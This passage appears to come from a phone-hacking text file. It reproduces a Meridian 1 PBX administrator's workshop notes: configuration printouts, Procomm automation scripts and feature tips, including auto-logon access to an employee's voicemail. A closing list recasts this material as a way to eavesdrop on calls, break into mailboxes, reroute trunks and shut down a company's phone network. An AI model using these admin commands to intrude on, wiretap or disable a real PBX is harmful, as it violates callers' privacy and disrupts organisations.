  2918.     LPR XRA CWD SWD MWA LPD XHD CCSD LNA TVD
  2919.     CFTD SFD C6D PDN CNID CLBD AUTU
  2920.     ICDD CDMD EHTD MCTD
  2921.     GPUD DPUD CFXD ARHD OVDD AGTD CLTD LDTA ASCD
  2922.     MBXD CPFA CPTA DDGA NAMA
  2923.     SHL ABDD CFHD
  2924.     USRD BNRD OCBD
  2925. RCO 0
  2926. PLEV 02
  2927. FTR CFW 4
  2928. DATE 28 NOV 1978
  2929.  
  2930.  
  2931. LD86 ESN - the Start of BARS
  2932. ----------------------------
  2933.  
  2934. The ESN data block is the root of BARS. Before BARS can be set up, the ESN
  2935. data block must be defined.
  2936.  
  2937. >ld 86
  2938. ESN000
  2939.  
  2940. REQ prt
  2941. CUST 0
  2942. FEAT esn
  2943.  
  2944. MXLC 0
  2945. MXSD 30
  2946. MXIX 0
  2947. MXDM 100
  2948. MXRL 80
  2949. MXFC 60
  2950. MXFS 0
  2951. MXSC 120
  2952. NCDP 4
  2953. AC1 9 <-- This is where "9" is defined
  2954. AC2
  2955. DLTN YES
  2956. ERWT YES
  2957. ERDT 0
  2958. TODS 0 00 00 23 59  <-- This section refers only to time of day
  2959. routing controls
  2960. RTCL DIS
  2961. NCOS 0 - 0  <-- This section refers only to time of day routing
  2962. controls
  2963. NCOS 1 - 1
  2964. NCOS 2 - 2
  2965. NCOS 3 - 3
  2966. NCOS 4 - 4
  2967. NCOS 5 - 5
  2968. NCOS 6 - 6
  2969. NCOS 7 - 7
  2970. <continued to 99...>
  2971. NCOS 99 - 99
  2972. ETOD
  2973. TGAR NO
  2974.  
  2975. REQ end
  2976.  
  2977.  
  2978. ISLUA 99 Session BA 20  
  2979. Capturing Data From Your Meridian 1
  2980. to Various PC Software Packages
  2981. Curt Kempf City of Columbia, Missouri
  2982. Thanks for attending the workshop
  2983. I hope you find this information helpful
  2984. ========================================
  2985.  
  2986.         o ACD Daily Report
  2987.  
  2988.         o Procomm Plus Script to
  2989.           capture ACD reports to
  2990.           disk. Format: MMDDYY.TXT
  2991.  
  2992.         o TN PRT out of Host MCA card
  2993.  
  2994.         o Procomm Script to CHG a TN
  2995.           when it becomes IDLE 
  2996.  
  2997.         o Procomm Script to CHG/NEW
  2998.           a list of DNs and their
  2999.           NAMES (LD 95)
  3000.  
  3001.         o Procomm Script to monitor
  3002.           PBX for "DTA0021", "INI0",
  3003.           "PWR01", then send an
  3004.           alpha numeric page when
  3005.           received.
  3006.  
  3007.  
  3008. ACD Daily Report
  3009. ================
  3010. ACD 000   1999 03 29   17:00 
  3011. DAILY TOTALS REPORT 
  3012.  
  3013.  
  3014. REPT 1
  3015. ACD   AVG CALLS       AVG  AVG  AVG  AVG    DN  AVG   #-XFER   AVG-TIME-POSN
  3016.  DN  AGTS ANSWD  ASA  DCP  PCP WORK WAIT CALLS TIME  IDN  ACD   BUSY MANNED 
  3017. 7380        324   54  125  388  514  127   118   69    0   28  22085  27246 
  3018. ------------------------------------------------------------------------------
  3019.   1         324   54  125  388  514  127   118   69    0   28  22085  27246 
  3020.  
  3021. REPT 2
  3022. ACD  CALLS  RECALL ANSWERED  ABANDONED      TOF TOF  OVER    INTER  
  3023.  DN ACCPTED  TO    LONGEST   NO. AVG.WT TSF IN  OUT  FLOW    FLOW   
  3024.             SOURCE WT. TIME                                  BUSY
  3025. 7380    366      0      476   43    88   80   0   0     8       0 
  3026. ------------------------------------------------------------------------------
  3027.   1     366      0      476   43    88   80   0   0     8       0 
  3028.  
  3029. REPT 4
  3030. POS CALLS   AVG   AVG   AVG   DN  INC   DN   OUT   #-XFER   BUSY MANNED 
  3031.  ID ANSWD   DCP   PCP  WAIT  INC TIME  OUT  TIME  IDN  ACD  TIME   TIME 
  3032.  
  3033. ACD DN 7380 
  3034.  301     81   136   115   142    3   66   12   352    0    9 20716  32208 
  3035.  303     57    91   261   139    4  478   15   652    0    4 20788  28702 
  3036.  309     49    90     2   182    0    0    1   100    0    7  4550  13466 
  3037.  304     87   128   127   108    1   60   12   564    0    6 22662  32088 
  3038.  305     39   185   108    73    0    0    2    96    0    1 11464  14302 
  3039.  308      0 ***** ***** *****   15 1770   20  1464    0    0 32256  32400 
  3040.  306      0 ***** ***** *****    9 2950   13  1660    0    0 32400  32400 
  3041.  312     11   145  2686    50    4  286    7   416    0    1 31848  32400 
  3042.  ------------------------------------------------------------------------
  3043.    8    324   125   388   127   36   93   82    88    0   28  2945   3633 
  3044.  
  3045.  
  3046. Procomm Plus Script to capture ACD
  3047. reports to disk.  Format: MMDDYY.TXT
  3048. ====================================
  3049.  
  3050.  ; ProComm script by Chris Fourroux & Curt Kempf/City of Columbia - tested
  3051.  ; with ProComm Plus 32 95/NT, version 4.  Script to caputure ACD reports to
  3052.  ; disk with the format XXXXXX.txt, where XXXXXX is month day year. Script
  3053.  ; waits for "ACD DN 7380" to occur, which is on every hourly report, then
  3054.  ; closes and appends the newest statistics to MMDDYY.TXT file.
  3055.   
  3056.     string cmd="ncopy c:\capture\"
  3057.     string szFileName = $DATE
  3058.     string szDate = $DATE
  3059.     integer Pos = 0
  3060.      
  3061.  proc main
  3062.     dial data "Option 61"  
  3063.     set capture overwrite OFF            ; if capture file exists, append data to it.
  3064.     capture off                          ; close capture file if it is open
  3065.     when TARGET 0 "ACD DN 7380" call CLOSECAP
  3066.  
  3067.     Startloop:
  3068.     clear                                ; clear contents of screen and scroll back buffer
  3069.     szFileName = $DATE
  3070.     szDate = $DATE
  3071.     while 1
  3072.       if nullstr szFileName              ; Check to see if we've reached
  3073.         exitwhile                        ; the end of source string
  3074.       endif                              ; and if so, exit loop.
  3075.       if strfind szFileName "/" Pos      ; Check for char
  3076.         strdelete szFileName Pos 1       ; and delete it
  3077.       else
  3078.         exitwhile                        ; exit if no more characters
  3079.       endif
  3080.     endwhile
  3081.  
  3082.     strcat szFileName ".txt"
  3083.     set capture file szFileName          ; Set name of capture file.
  3084.     capture on                           ; Open up the capture file.
  3085.     while strcmp $DATE  szDate           ; Loop while date is the same
  3086.     endwhile                             ; or if the date changes,
  3087.     capture off                          ; Close the capture file.
  3088.     goto Startloop                       ; and start a new one.
  3089.  endproc
  3090.  
  3091.  proc closecap
  3092.     pause 3
  3093.     strcat cmd szFileName                ; Append to variable "CMD"
  3094.     strcat cmd " h:\uab\"                ; Append network drive to "CMD"
  3095.     transmit "^M***********^M"           ; Put in asteriks between hourly reports
  3096.     capture off                          ; Close capture file
  3097.     pause 5
  3098.     DOS cmd HIDDEN i0                    ; Run "CMD" in DOS and copy file to the LAN
  3099.     pause 10
  3100.     taskexit i0                          ; Exit DOS window
  3101.     pause 10
  3102.     cmd="ncopy c:\capture\"              ; Reset "CMD"
  3103.     capture on                           ; Turn Capture back on.
  3104.  Endproc
  3105.  
  3106.  
  3107. Procomm Screen of dialing up the host
  3108. MCA card(direct connect 9600 baud)
  3109. =====================================
  3110.  
  3111. ENTER NUMBER OR H (FOR HELP):   2206
  3112.  
  3113. CALLING  2206
  3114. RINGING
  3115. ANSWERED
  3116. CALL CONNECTED. SESSION STARTS
  3117. logi
  3118. PASS?
  3119. TTY #02 LOGGED IN 08:59  11/4/1999
  3120. >
  3121.  
  3122. TN PRT out of Host MCA card
  3123.  
  3124. DES  2206
  3125. TN   020 0 04 31        ;note TN is TN of voice set(20 0 4 15) +(plus) 16
  3126. TYPE 2616
  3127. CDEN 8D
  3128. CUST 0
  3129. AOM  0
  3130. FDN
  3131. TGAR 1
  3132. LDN  NO
  3133. NCOS 2
  3134. SGRP 0
  3135. RNPG 0
  3136. SCI  0
  3137. SSU
  3138. XLST
  3139. SCPW
  3140. CLS  CTD FBD WTD LPR MTD FND HTD ADD HFD
  3141.      MWD AAD IMD XHD IRD NID OLD DTA DRG1
  3142.      POD DSX VMD CMSD CCSD SWD LND CNDD
  3143.      CFTD SFD DDV CNID CDCA
  3144.      ICDD CDMD MCTD CLBD AUTU
  3145.      GPUD DPUD DNDD CFXD ARHD FITD CLTD ASCD
  3146.      CPFA CPTA ABDD CFHD FICD NAID
  3147.      DDGA NAMA
  3148.      USRD ULAD RTDD PGND OCBD FLXD FTTU
  3149. TOV   0  MINS
  3150. DTAO MCA
  3151. PSEL  DMDM
  3152. HUNT
  3153. PSDS  NO
  3154. TRAN  ASYN
  3155. PAR  SPACE
  3156. DTR  OFF
  3157. DUP  FULL
  3158. HOT  OFF
  3159. AUT  ON
  3160. BAUD 9600
  3161. DCD  ON
  3162. PRM  HOST ON
  3163. VLL  OFF
  3164. MOD  YES
  3165. INT  OFF
  3166. CLK  OFF
  3167. KBD  ON
  3168. RTS  ON
  3169. PLEV 02
  3170. AST
  3171. IAPG 0
  3172. AACS NO
  3173. ITNA NO
  3174. DGRP
  3175. DNDR 0
  3176. KEY  00 SCR 2206 0     MARP
  3177.      01
  3178.      02
  3179.      03
  3180.      04
  3181.      05
  3182.      06
  3183.      07
  3184.      08
  3185.      09
  3186.      10
  3187.      11
  3188.      12
  3189.      13
  3190.      14
  3191.      15
  3192. DATE 30 DEC 1997
  3193.  
  3194. Very rarely, I can not dial up the host MCA card. It simply won't answer, so
  3195. the following usually clears it up:
  3196.  
  3197. ITEM
  3198. ITEM OPE YES
  3199.                 DCD ON
  3200.                 PRM OFF
  3201.  
  3202. If that doesn't work, since 020 0 04 31 is "digital", it could be disabled.
  3203.  
  3204. LD 32 and ENLU it.
  3205.  
  3206. Procomm Script to CHG a TN when it becomes IDLE 
  3207. ===============================================
  3208.  
  3209.  string TN                               ;TN
  3210.  string TIPE                             ;TYPE, however word is reserved in ASPECT
  3211.  string EYETEM                           ;ITEM, ditto above.
  3212.  string szList                           ;List of items.
  3213.  string szItem                           ;Item selected from list.       
  3214.  integer Event                           ;Dialog box event.      
  3215.  integer Num                             ;integer value  
  3216.  proc MAIN
  3217.          set txpace 50                   ;delay for keyboard
  3218.          when TARGET 0 "IDLE" call CHGIT ;when receive IDLE, go change set.
  3219.                                                          ;Input the TN, TYPE, and ITEM
  3220.          sdlginput "LD 11, CHG when IDLE :-)" "Enter TN: " TN
  3221.          if strcmp TN ""                 ; compare to see if NULL?
  3222.            halt                          ;if enter is pressed, halt script.
  3223.          else
  3224.          endif
  3225.          
  3226.                                          ; Display dialog box with list of items.
  3227.                                          ; Pick if set is a 500, 2008, or 2616
  3228.          szList = "2616,2008,500"
  3229.          dialogbox 0 55 96 100 74 11 "LD 11, CHG when IDLE :-)"
  3230.          listbox 1 5 5 90 40 szList single szItem
  3231.          pushbutton 2 28 52 40 14 "&Exit" ok default
  3232.          enddialog
  3233.          
  3234.          while 1
  3235.          dlgevent 0 Event                ; Get the dialog event.
  3236.          switch Event                    ; Evaluate the event.
  3237.           case 0                         ; No event occurred.
  3238.           endcase
  3239.           case 1 
  3240.                  if strcmp szItem "2616"
  3241.                  tipe = "2616"
  3242.          else
  3243.          if strcmp szItem "2008"
  3244.                  tipe = "2008"
  3245.          else
  3246.          if strcmp szItem "500"
  3247.                  tipe = "500"
  3248.          endif
  3249.          endif
  3250.          endif
  3251.  
  3252.          endcase
  3253.           default                        ; Exit case chosen.
  3254.           exitwhile
  3255.          endcase
  3256.          endswitch       
  3257.          endwhile
  3258.          
  3259.          dlgdestroy 0 CANCEL             ; Destroy the dialog box.       
  3260.  
  3261.          sdlginput "LD 11, CHG when IDLE :-)" "ITEM: (IE: CLS HTA)" EYETEM       
  3262.          Transmit "LD 11^M"              ;Go in to overlay 11    
  3263.          Waitfor "REQ"
  3264.                  
  3265.          for Num = 0 upto 100            ;Keep STAT'n til IDLE
  3266.                  Transmit "STAT "
  3267.                  Transmit TN
  3268.                  Transmit "^M"
  3269.                  pause 10                ; wait 10 seconds
  3270.                  endfor
  3271.  
  3272.  endproc
  3273.  
  3274.  PROC CHGIT                      
  3275.  
  3276.          Transmit "CHG^M"                ;Go change the set, then halt the script.
  3277.                          
  3278.          Waitfor "TYPE"
  3279.          Transmit TIPE
  3280.          pause 1                         ;pause 1 second
  3281.          Transmit "^M"
  3282.                          
  3283.          Waitfor "TN"
  3284.          Transmit TN
  3285.          Transmit "^M"
  3286.          
  3287.          Waitfor "ECHG"
  3288.          Transmit "YES^M"
  3289.                          
  3290.          Waitfor "ITEM"
  3291.          Transmit EYETEM
  3292.          Transmit "^M"
  3293.          waitfor "ITEM"
  3294.          transmit "^M"
  3295.  
  3296.          Waitfor "REQ:"
  3297.          Transmit "END^M"
  3298.          
  3299.          halt
  3300.  endproc
  3301.  
  3302.  
  3303. Procomm Script to CHG/NEW a list of DNs and their NAMES (LD 95)
  3304. ===============================================================
  3305.  
  3306.          integer flag=0          ;set flag
  3307.  
  3308.  proc main
  3309.          set txpace 100                                  ;delay for keyboard
  3310.          when TARGET 1 "SCH2115" call LD95NEW            ;wait for 'name does not exit' error
  3311.                                                          ;open text file that has a list of 
  3312.                                                          ;DNs & NAMEs you want to change/add.
  3313.          fopen 1 "C:\phone\chgnames.txt" READ                    
  3314.                  ;chgnames.txt it in the format of
  3315.                  ;       7354, Jane Doe
  3316.                  ;       6745, John Smith
  3317.                  ;       7645, Dan White
  3318.                  ;script doesn't care if the NAME is NEW or CHG J
  3319.          if failure
  3320.                  usermsg "could not open the file."
  3321.          else
  3322.                  Transmit "LD 95^M"              ;Go in to overlay 95    
  3323.                  Waitfor "REQ"
  3324.                  Transmit "CHG^M"
  3325.                  Waitfor "TYPE"
  3326.                  Transmit "NAME^M"
  3327.                  Waitfor "CUST"
  3328.                  Transmit "0^M"
  3329.                  Waitfor "DIG"
  3330.                  Transmit "^M"
  3331.                  fseek 1 0 0
  3332.                  while 1
  3333.                          fgets 1 s0
  3334.                          if FEOF 1
  3335.                                  exitwhile
  3336.                          endif
  3337.                          strtok s1 s0 "," 1
  3338.                          strtok s2 s0 "," 1              
  3339.                          DelStr (&s1)
  3340.                          DelStr (&s2)
  3341.                     DelLineFeed (&s2)
  3342.                       ;strfmt s4 "TN:  %s" s1    ;uncomment these two for
  3343.                       ;usermsg s4                ;troubleshooting the script
  3344.                          strlen s1 i0
  3345.                          if (i0 > 2)
  3346.                             LD95CHG ()
  3347.                          else
  3348.                             Transmit "****^M"
  3349.                             halt         
  3350.                          endif
  3351.                  endwhile
  3352.          endif
  3353.  endproc
  3354.  
  3355.  proc LD95CHG
  3356.  Waitfor "DN"
  3357.  Transmit s1
  3358.  Transmit "^M"
  3359.  pause 1
  3360.  
  3361.  if FLAG==1
  3362.          FLAG=0
  3363.          Transmit "^M"
  3364.          return
  3365.  else
  3366.  Transmit s2
  3367.  Transmit "^M"
  3368.  Waitfor "DISPLAY_FMT"
  3369.  endif
  3370.  endproc
  3371.  
  3372.  proc LD95NEW
  3373.          FLAG=1
  3374.          Transmit "^M"
  3375.          Transmit "**^M"
  3376.          Waitfor "REQ"
  3377.          Transmit "NEW^M"
  3378.          Waitfor "TYPE"
  3379.          Transmit "NAME^M"
  3380.          Waitfor "CUST"
  3381.          Transmit "0^M"
  3382.          Waitfor "DIG"
  3383.          Transmit "^M"
  3384.          Waitfor "DN"
  3385.          Transmit s1
  3386.          Transmit "^M"
  3387.          Waitfor "NAME"
  3388.          Transmit s2
  3389.          Transmit "^M"
  3390.          Waitfor "DISPLAY_FMT"
  3391.          Transmit "^M"
  3392.          Waitfor "DN"
  3393.          Transmit "^M"   
  3394.          Waitfor "REQ"
  3395.          Transmit "CHG^M"
  3396.          Waitfor "TYPE"
  3397.          Transmit "NAME^M"
  3398.          Waitfor "CUST"
  3399.          Transmit "0^M"
  3400.          Waitfor "DIG"
  3401.  endproc 
  3402.  
  3403.  proc DelStr 
  3404.  param string szStr
  3405.  integer Pos
  3406.          while 1
  3407.                  if StrFind szStr "`"" Pos
  3408.                          StrDelete szStr Pos 1
  3409.                  else
  3410.             exitwhile
  3411.                  endif
  3412.          endwhile
  3413.  endproc
  3414.  
  3415.  PROC DelLineFeed 
  3416.  param string szStr
  3417.  integer Pos
  3418.          strlen szStr Pos
  3419.          if (Pos > 2)
  3420.                  StrDelete szStr (Pos-1) 1
  3421.          endif
  3422.  endproc
  3423.  
  3424.  
  3425.  
  3426. You could very easily modify this script to say, change an ASCII list of TNs
  3427. /TYPEs to TGAR 1, and have it executed at 2:00 a.m. The s0 and s1 variables
  3428. would change from DN & NAME, to TN & TYPE, and add Waituntil "2:00:00" "7/16
  3429. /99" to kick it off at 2:00 a.m.
  3430.  
  3431. Procomm Script to monitor PBX for "DTA0021", "INI0", "PWR01", then send 
  3432. an alph numeric page when received.
  3433. =======================================================================
  3434.  
  3435.  proc Main
  3436.     #DEFINE pagernum "235.5334"          ;Enter your pager number here.
  3437.     string szName="OPT61.cap"            ;Name of text file to capture to.
  3438.     string passw
  3439.     when TARGET 1 "DTA021" call DTA021   ;what do you want to 'wait for' ?
  3440.     when TARGET 2 "INI0" call INI0
  3441.     when TARGET 3 "PWR01" call PWR0
  3442.  
  3443.     set capture file szName
  3444.     capture on
  3445.     set txpace 150                       ;delay for keyboard   
  3446.     HANGUP
  3447.     Dial DATA "MCA" 
  3448.     transmit "^M"
  3449.     waitfor "HELP):"  
  3450.     transmit "2206^M" 
  3451.     waitfor "SESSION STARTS"
  3452.     while $CARRIER
  3453.      transmit "****"
  3454.      pause 1
  3455.      transmit "LOGI^M"
  3456.      waitfor "PASS?"
  3457.      sdlginput "Security" "Password: (all caps!)" passw MASKED
  3458.      if stricmp passw "sss"                      ;to bypass logging in.
  3459.      transmit "*"
  3460.      call loggedin
  3461.      endif
  3462.      transmit passw
  3463.      transmit "^M"
  3464.      pause 2
  3465.     endwhile
  3466.     set txpace 1
  3467.  endproc
  3468.  
  3469.  proc DTA021
  3470.    pageA()                                       ;dial paging provider
  3471.    TRANSMIT "Digital Trunk Diagnostic. Frame alignment persisted for 
  3472.                  3 seconds^M"                    ;send specific x11 error to pager
  3473.    pageB()                                       ;end connection to provider
  3474.    mcacard()                                     ;connect back to Option 61
  3475.  endproc
  3476.  
  3477.  proc INI0
  3478.    pageA()
  3479.    TRANSMIT "An initialization has taken place.^M"
  3480.    pageB()
  3481.    mcacard()
  3482.  endproc
  3483.  proc PWR0
  3484.    pageA()
  3485.    TRANSMIT "Power failure from power and system monitor.^M"
  3486.    pageB()
  3487.    mcacard()
  3488.  endproc
  3489.  
  3490.  proc mcacard
  3491.   HANGUP
  3492.   PAUSE 2
  3493.   Dial DATA "MCA"                        ;Connect up to option 61 through MCA card.
  3494.   while $DIALING
  3495.   endwhile
  3496.   transmit "^M"
  3497.   pause 1
  3498.   transmit "^M"
  3499.   waitfor "HELP):"  
  3500.   transmit "2206^M" 
  3501.   waitfor "SESSION STARTS"
  3502.   pause 1
  3503.   when RESUME
  3504.   call loggedin
  3505.   loggedin()
  3506.  endproc
  3507.  
  3508.  proc loggedin
  3509.   while $CARRIER         ;wait for errors to occur.  Continue to do your MACs etc..
  3510.   endwhile
  3511.  endproc
  3512.  
  3513.  proc pageA
  3514.   when SUSPEND
  3515.   set port dropdtr on
  3516.   pause 1
  3517.   hangup                         ;hangup Option 61 connection
  3518.   pause 2
  3519.   hangup                         ;release mca card from COM port
  3520.   set port dropdtr off
  3521.   pause 1
  3522.   Dial DATA "TriStar"            ;Dial your paging provider
  3523.          while $DIALING
  3524.          endwhile
  3525.          TRANSMIT "^M"           ;TAPI protocol, M puts in manual mode.
  3526.          WAITFOR "ID="
  3527.          TRANSMIT "M^M"
  3528.          WAITFOR "Enter pager"
  3529.          TRANSMIT pagernum
  3530.          TRANSMIT "^M"
  3531.          WAITFOR "Enter alpha"
  3532.  endproc
  3533.  
  3534.  proc pageB
  3535.          TRANSMIT "^M"
  3536.          WAITFOR "More Pag"
  3537.                  TRANSMIT "^M"
  3538.          pause 2
  3539.  endproc
  3540.  
  3541.  
  3542. Little Known Meridian 1 Features And Programming Tricks
  3543. =======================================================
  3544. HELP and Error Lookup 
  3545.  
  3546.      HELP - Type " ? " at many prompts 
  3547.      LOOKUP - At " > " sign, type 
  3548.      ERR AUD028 to find out what AUD028 indicates. 
  3549.      At any other prompt, type " ! ", then you will receive " > "
  3550.      symbol for getting ERR lookup. 
  3551.  
  3552. Find Sets with a Certain Feature
  3553. ================================
  3554.      LD81 
  3555.      REQ LST 
  3556.      FEAT CFXA 
  3557.      FEAT UNR 
  3558.  
  3559.           Lists all sets that have the "Call Forward External Allow"
  3560.           feature, then lists all UNR sets. 
  3561.  
  3562. Inventory and Identification Commands 
  3563. =====================================
  3564.      LD32 
  3565.      IDU l s c u (or) IDC l s c 
  3566.      LD22 
  3567.      CINV (and) ISSP 
  3568.      LD30 
  3569.      UNTT l s c u 
  3570.  
  3571. Speed Call Stuff 
  3572. ================
  3573. Create many Speed Call lists at once. LD18 REQ: NEW 100 - Creates 100 lists.
  3574. When memory is plentiful, make Speed Call list number the same as the persons
  3575. DN. Need to increase MSCL in LD17 Find a "Controller" in LD81 by: REQ:LST,
  3576. FEAT:SCC, then the Speed List Number 
  3577.  
  3578. Allow Restricted Sets to Dial Certain Long Distance Numbers. 
  3579. ============================================================
  3580. Add the numbers to a System Speed Call List. Assign an NCOS to the "List"
  3581. that replaces the users NCOS during the call. Alternate: Add the suffix of
  3582. the telephone number to an ARRN list in the prefixes RLI. This will point
  3583. only that number to a new RLI with a lower (or higher if you choose) FRL.
  3584. Look up ARRN in LD86 
  3585.  
  3586. PBX Clock Fast or Slow? 
  3587. =======================
  3588. LD2 
  3589. SDTA X Y -- x y 
  3590.      X = 0 for "subtract time each day" -or- 1 for "add time each day"
  3591.      Y = 0-60 seconds to be added or subtracted each day. 
  3592. Daylight Savings Question? 
  3593. TDST Look this one up in LD2 before changing 
  3594.  
  3595. Phantom DNs, TNs, and "MARP to Voice Mail" TNs 
  3596. ==============================================
  3597. Phantom TN with FTR DCFW ACD Queues with NCFW but no Agents 2616 Sets with
  3598. AOMs (AOMs can be in "software", but do not need to be "installed" on the
  3599. set). This is an excellent "MARP TN" for DNs that need to HUNT/FDN to Voice
  3600. Mail
  3601.  
  3602. Digit Display on Trunk Routes and ACD Queues 
  3603. ============================================
  3604. Find Trunk Route Access Codes - name in LD95 like any other DN ACD Numbers -
  3605. name in LD95 like any other DN IDC Numbers - name in LD95 at DCNO prompt. 
  3606.  
  3607. Limited Access Passwords 
  3608. ========================
  3609. Print PWD in LD22 before starting
  3610. LD17
  3611. LAPW 01 
  3612. PW01 12345 
  3613. OVLA 10 11 20 
  3614.  
  3615. Identify Trunks, Routes and TTY Ports with "DES" Entry 
  3616. ======================================================
  3617. LD17 ADAN 
  3618. DES can be 1-16 characters 
  3619. LD16 RDB 
  3620. DES can be 1-16 characters 
  3621. LD14 TRK 
  3622. DES can be 1-16 characters 
  3623. TKID - enter telephone number 
  3624.  
  3625. Free Up or Block DN Range 
  3626. =========================
  3627. Change your SPRE Code to 4 digits LD15 - SPRE XXXX Assign all current feature
  3628. codes as Flexible Feature Codes To hide DNs from appearing in LUDN printouts,
  3629. enter DN prefix ranges as an FFC for "Ring Again Activate" 
  3630.  
  3631. Save "Call Forward" Status upon Reload/Sysload 
  3632. ==============================================
  3633. LD17 
  3634. CFWS YES 
  3635.  
  3636. Call Waiting "Buzz" on Digital Sets is Not Long Enough 
  3637. ======================================================
  3638. Turn on Flexible Incoming Tones Allowed 
  3639. LD15 
  3640. OPT SBA DBA 
  3641. LD 11 
  3642. CLS FITA 
  3643.  
  3644. "DSP" Display Key Applications 
  3645. ==============================
  3646. Youre on the phone, another call comes in...Press DSP, then ringing line to
  3647. see whos calling. Press DSP, then Speed Call, then entry number to view
  3648. entries. Rls23 Update - automatic Display CLS TDD 
  3649.  
  3650. NHC - No Hold Conference 
  3651. ========================
  3652. With NHC, other party is not placed on hold while adding conferees. You can
  3653. also disconnect conferee called with NHC
  3654. LD11 
  3655. KEY X NHC 
  3656. Rls23 Update - Conf. Display/Disconnect 
  3657. LD11 
  3658. CLS CDCA 
  3659.  
  3660. Call Forward Indication on 2500 Sets 
  3661. ====================================
  3662. Add Call Forward Reminder Tone. Special dial tone is heard only when call
  3663. forwarded.
  3664. LD15 
  3665. OPT CFRA 
  3666.  
  3667. Override Call Forwarded Phone 
  3668. =============================
  3669. Add Flexible Feature Code for "CFHO". Dial CFHO code, then dial extension. 
  3670. LD57 
  3671. CODE CFHO 
  3672. On sets needing ability to perform override 
  3673. CLS CFHA 
  3674.  
  3675. Call Forward ONLY Internal Calls - Let Externals Ring 
  3676. =====================================================
  3677. Great when you need to prioritize external callers. 
  3678. LD11 
  3679. KEY X ICF 4 ZZZZ 
  3680.  
  3681. "Delayed" Ring on Multiple Appearance DNs 
  3682. =========================================
  3683. Non-ringing (SCN) keys will ring after a certain duration. Great for areas
  3684. where many of the same DNs appear.
  3685. LD11 
  3686. DNDR X 
  3687. (X = 0-120 seconds of delay before SCN keys will start to ring) 
  3688.  
  3689. Audible Reminder of Held Calls 
  3690. ==============================
  3691. Receive "buzz tone" every X seconds to remind user that call is on hold. Also
  3692. reminds user that Conference/Transfer was mishandled - call was never
  3693. transferred
  3694. LD15 
  3695. DBRC X (X = 2-120 seconds between reminders) 
  3696. LD11, CLS ARHA 
  3697.  
  3698. Which Call "On Hold" is Mine 
  3699. ============================
  3700. Exclusive Hold sets held calls to "wink" at holding set, but stay "steady" at
  3701. other sets.
  3702. LD10/11 
  3703. CLS XHA 
  3704.  
  3705. Change Ring Cadence/Tone 
  3706. ========================
  3707. There are 4 ring styles, adjusted in the CLS of the digital set. 
  3708. LD11 
  3709. CLS: DRG1 -or- DGR2 -or- DRG3 -or- DRG4 
  3710. Set pesky customer phones to DRG4 ! 
  3711.  
  3712. BFS - Nightmare in Shining Armor ? 
  3713. ==================================
  3714. BFS Keys allow the user to monitor the Call Forward and busy status of a set,
  3715. activate and deactivate Call Forward, and can be used as an Autodial key.
  3716. NOTE: Cannot perform MOV command with BFS. User can also forward sets by
  3717. accident.
  3718. LD11 
  3719. Key XX BFS l s c u (target sets TN) 
  3720.  
  3721. More Than 4 DNs Answered by One Mailbox? 
  3722. ========================================
  3723. Add up to 3 DNs to DN list in mailbox programming. Add 4th and all additional
  3724. DNs in "Voice Service DN" (VSID) Table and set to "EM" to the mailbox. 
  3725.  
  3726. 1 Single LineTelephone, 3 DNs, 3 Users, 3 Mailboxes? How? 
  3727. =========================================================
  3728. Create one 2500 set with one of the three DNs. Create 2 Phantom TNs, each one
  3729. with a new DN and DCFW each of them to the 2500 sets DN (from above) Add the
  3730. three mailboxesànow any of the three numbers will ring the one set, but
  3731. messages will be separated!
  3732.  
  3733. Change An NCOS After Hours
  3734. ==========================
  3735. Here's an excerpt from the LD86 ESN data block that has NCOS 3 & 4 change to
  3736. NCOS 2 after 4:30PM and all day on weekends
  3737.  
  3738.      <snip>
  3739.  
  3740.      AC1 9
  3741.      AC2
  3742.      DLTN YES
  3743.      ERWT YES
  3744.      ERDT 0
  3745.      TODS 0 06 00 16 29
  3746.           7 00 00 05 59
  3747.           7 16 30 23 59
  3748.      RTCL YES
  3749.      NCOS 0 - 0
  3750.      NCOS 1 - 1
  3751.      NCOS 2 - 2
  3752.      NCOS 3 - 2
  3753.      NCOS 4 - 2
  3754.      NCOS 5 - 5
  3755.  
  3756.      <snip>
  3757.  
  3758. Oops..the Console Went Into NITE...During the DAY! 
  3759. ==================================================
  3760. Use NITE entries that are based on "Time of Day". See Night Service in
  3761. Features Book If the console goes into NITE during the day, send them to
  3762. either a set of DNs next to the console, or a voice menu/thru-dialer
  3763. explaining that there are "technical difficulties". After hours, NITE calls
  3764. goes to where they should.
  3765.  
  3766. Just Two Security Tricks 
  3767. ========================
  3768. Create SPNs in BARS of: 000 thru 009 and create a Route List Block for them
  3769. with LTER=YES  Now when Phreakers ask for extn 9000, they get nobody. Use the
  3770. FLEN entry on SPNs 0, 00, 011 so that nobody can transfer a caller to 9011,
  3771. 90, etc.
  3772.  
  3773. Break Into Meridian Mailbox? 
  3774. ============================
  3775. Simply make the mailbox "Auto-logon". For remote access, add their DN to your
  3776. set. Convenient if you need to access an employees mailbox without changing
  3777. their password. Useful for modifying greetings of an absent employees or
  3778. allowing a temporary employee access to a mailbox without divulging the
  3779. regular employees password.
  3780.  
  3781. Tracing Phone Calls 
  3782. ===================
  3783. TRAC 0 XXXX (X=extension) 
  3784. TRAC l s c u 
  3785. TRAC l s c u DEV (Adds BARS info) 
  3786. TRAT 0 X (X=Console number) 
  3787. TRAD (see book, traces T1 channels) 
  3788. ENTC (see book, traces TN continuously - up to 3 TNs at a time ! ) 
  3789.  
  3790. Forgot your M3000 Directory Password? 
  3791. =====================================
  3792.      LD32 
  3793.      CPWD l s c u 
  3794.  
  3795. Another Idea 
  3796. ============
  3797. Use a PC to log into your PBX, then activate the "capture file". Now run a
  3798. TNB and keep it as a file rather than on paper. If your TNB file is large,
  3799. try a high power text editor, which can open even 20meg files in seconds.
  3800. Search the Internet "Text Editor" Keep copies so you can go back and see how
  3801. a set was programmed when you out it by mistake. 
  3802.  
  3803. */
  3804.  
  3805. Using the above information you could sucessfully do the following:
  3806.  
  3807. a) Setup your own trunk configurations that allow outgoing calls.
  3808. b) Reset lines and trunks, reconfugure lines and trunks.
  3809. c) Set an internal extension(s) to share the same multiplexed trunk as you
  3810.    so you can effectivly listen in on any incomming/outgoing phone call
  3811.    made on that extension.
  3812. d) Set up calls that don't exist with no trunk assignment.
  3813. e) Set any users voicemail box with auto-logon paremters temporarily.
  3814. f) Close down the entire network
  3815. g) Set every phone in the company to ring forever...
  3816. h) Re-route incomming/outgoing trunk calls to any destination.
  3817. i) Park your own incomming line as "on console" so you can answer calls made
  3818.    to a pre-set extension.
  3819. j) Make yourself the company oprtator.
  3820. k) Trace phonecalls, audit logs etc.
  3821. l) Set all trunks to loopback on one another.
  3822. m) Anything you want?
  3823.  
